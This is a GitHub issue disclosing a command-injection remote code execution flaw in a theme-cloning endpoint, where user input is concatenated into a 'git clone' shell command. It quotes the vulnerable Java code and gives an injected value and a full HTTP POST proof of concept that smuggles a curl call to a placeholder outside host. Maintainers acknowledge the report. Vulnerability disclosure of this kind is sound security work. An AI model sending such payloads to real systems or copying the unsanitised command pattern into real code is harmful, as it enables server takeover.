Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Remote Code Execution in your system #134

Closed
4 of 6 tasks
Artemis1029 opened this issue Apr 4, 2019 · 2 comments
Closed
4 of 6 tasks

Remote Code Execution in your system #134

Artemis1029 opened this issue Apr 4, 2019 · 2 comments
Labels
kind/bug Categorizes issue or PR as related to a bug. vulnerability Vulnerability

Comments

@Artemis1029
Copy link

Artemis1029 commented Apr 4, 2019

我确定我已经查看了 (标注[ ][x])


我要申请 (标注[ ][x])

  • BUG 反馈
  • 添加新的特性或者功能
  • 请求技术支持

Bug Report

I read the code and find that function cloneFromRemote have a system call as

@PostMapping(value = "/clone")
    @ResponseBody
    public JsonResult cloneFromRemote(@RequestParam(value = "remoteAddr") String remoteAddr,
                                      @RequestParam(value = "themeName") String themeName) {
        if (StrUtil.isBlank(remoteAddr) || StrUtil.isBlank(themeName)) {
            return new JsonResult(ResultCodeEnum.FAIL.getCode(), localeMessageUtil.getMessage("code.admin.common.info-no-complete"));
        }
        try {
            final File basePath = new File(ResourceUtils.getURL("classpath:").getPath());
            final File themePath = new File(basePath.getAbsolutePath(), "templates/themes");
            final String cmdResult = RuntimeUtil.execForStr("git clone " + remoteAddr + " " + themePath.getAbsolutePath() + "/" + themeName);
            if (NOT_FOUND_GIT.equals(cmdResult)) {
                return new JsonResult(ResultCodeEnum.FAIL.getCode(), localeMessageUtil.getMessage("code.admin.theme.no-git"));
            }
            THEMES.clear();
            THEMES = HaloUtils.getThemes();
        } catch (FileNotFoundException e) {
            log.error("Cloning theme failed: {}", e.getMessage());
            return new JsonResult(ResultCodeEnum.FAIL.getCode(), localeMessageUtil.getMessage("code.admin.theme.clone-theme-failed") + e.getMessage());
        }
        return new JsonResult(ResultCodeEnum.SUCCESS.getCode(), localeMessageUtil.getMessage("code.admin.common.install-success"));
    }

in

final String cmdResult = RuntimeUtil.execForStr("git clone " + remoteAddr + " " + themePath.getAbsolutePath() + "/" + themeName);

and you have do nothig with the remoteAddr and themeName, so I can type in

remoteAddr=a & curl xxx.xxx.xxx # 
themeName = 2333

and cmdString is

git clone a & cmd # xxxxxx
# cmd is your commad 

to RCE

POST /admin/themes/clone HTTP/1.1
Host: *******
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.47 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Referer: *******
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 60
Connection: close
Cookie: 
X-Forwarded-For: 127.0.0.2

remoteAddr=a+%26+curl+111111111%3A1339%23&themeName=aaa
@ruibaby ruibaby added the kind/bug Categorizes issue or PR as related to a bug. label Apr 4, 2019
@ruibaby
Copy link
Member

ruibaby commented Apr 4, 2019

Ok, we will start to solve these problems, thank you very much for your feedback.

@JohnNiang JohnNiang added the vulnerability Vulnerability label Apr 4, 2019
@ruibaby
Copy link
Member

ruibaby commented May 28, 2019

准备发布 v1,所以关闭该 issue。

@ruibaby ruibaby closed this as completed May 28, 2019
JohnNiang pushed a commit to JohnNiang/halo that referenced this issue Mar 2, 2023
Bumps [vuex](https://github.com/vuejs/vuex) from 3.1.3 to 3.3.0.
- [Release notes](https://github.com/vuejs/vuex/releases)
- [Changelog](https://github.com/vuejs/vuex/blob/dev/CHANGELOG.md)
- [Commits](vuejs/vuex@v3.1.3...v3.3.0)

Signed-off-by: dependabot-preview[bot] <support@dependabot.com>

Co-authored-by: dependabot-preview[bot] <27856297+dependabot-preview[bot]@users.noreply.github.com>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
kind/bug Categorizes issue or PR as related to a bug. vulnerability Vulnerability
Projects
None yet
Development

No branches or pull requests

3 participants